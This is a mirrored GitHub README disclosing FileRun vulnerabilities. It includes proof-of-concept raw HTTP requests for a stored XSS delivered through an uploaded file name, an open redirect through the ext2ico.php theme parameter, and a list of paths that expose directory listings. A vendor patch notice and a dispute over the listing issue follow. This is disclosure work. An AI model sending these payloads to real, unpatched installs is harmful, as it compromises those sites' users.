GithubHelp home page GithubHelp logo

emreovunc / filerun-vulnerabilities Goto Github PK

View Code? Open in Web Editor NEW
5.0 3.0 3.0 14 KB

FileRun application has many vulnerabilities such as cross-site scripting, open redirection, directory listing..

directory-listing cve-2019-12457 cve-2019-12458 cve-2019-12459 filerun xss-vulnerability openredirect cve-2019-12905 cve-search

filerun-vulnerabilities's Introduction

FileRun Vulnerabilities and Exploits

FileRun application has many vulnerabilities.

CVE-2019-12457 - CVE-2019-12458 - CVE-2019-12459 - CVE-2019-12905

PoC - XSS

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12905

To exploit vulnerability, someone could upload an allowed file named “><img src=x onerror=prompt(document.domain)> to impact users who open the page.

POST /filerun/?module=fileman&section=do&page=up HTTP/1.1
Host: 172.16.191.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.191.129/filerun/
Content-Type: multipart/form-data; boundary=---------------------------142096305821079611661465592403
Content-Length: 6034
DNT: 1
Connection: close
Cookie: FileRunSID=aqlneuv86ccj3pi4h476faopi5

-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="flowTotalSize"

5100
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="flowIsFirstChunk"

1
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="flowIsLastChunk"

1
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="flowFilename"

�><img src=x onerror=prompt(document.domain)>.jpg
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="path"

/ROOT/HOME
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="file"; filename="�><img src=x onerror=prompt(document.domain)>.jpg"
Content-Type: image/jpg

<%@ I said you should learn! %>


-----------------------------142096305821079611661465592403--

alt tag

alt tag

PoC - Open Redirect

An open redirect vulnerability exists in FileRun in '/filerun/images/fico/ext2ico.php?theme=' URL that allows attackers to redirect users to an arbitrary URL. A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect.

GET /filerun/images/fico/ext2ico.php?theme=https://filerun.com/isaid:)? HTTP/1.1
Host: 172.16.191.129
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: FileRunSID=8ig5vcpk39v1cilv3uq7dp8crn
Referer: http://172.16.191.129/filerun/js/min.php?v=2019.05.21
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Content-Length: 4

alt tag

PoC - Directory Listing

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12457

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12458

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12459

http://[server]/filerun/images/extjs/
http://[server]/filerun/css/ext-ux/
http://[server]/filerun/customizables/plugins/audio_player/

alt tag

alt tag

alt tag

Remediation

You should make sure the directory does not contain sensitive information or you may want to restrict directory listings from the web server configuration.

filerun-vulnerabilities's People

Contributors

emreovunc avatar

Stargazers

avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar

Forkers

secbaby zcomtenten 5l1v3r1

filerun-vulnerabilities's Issues

Remediation

The now available FileRun update (2019.06.01) fixes the reported issues. The update can be installed from the FileRun control panel: https://docs.filerun.com/updating

Great work with your findings! Kindly drop us a quick message if you find anything else in the future, to give the many users of our software a chance of protecting themselves. You'd still get the credit for it.

What's your definition of vulnerability?

You're browsing FileRun applications folders that are supposed to be publicly accessible for the browsers to load web resources from them. Listing their contents... So what?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.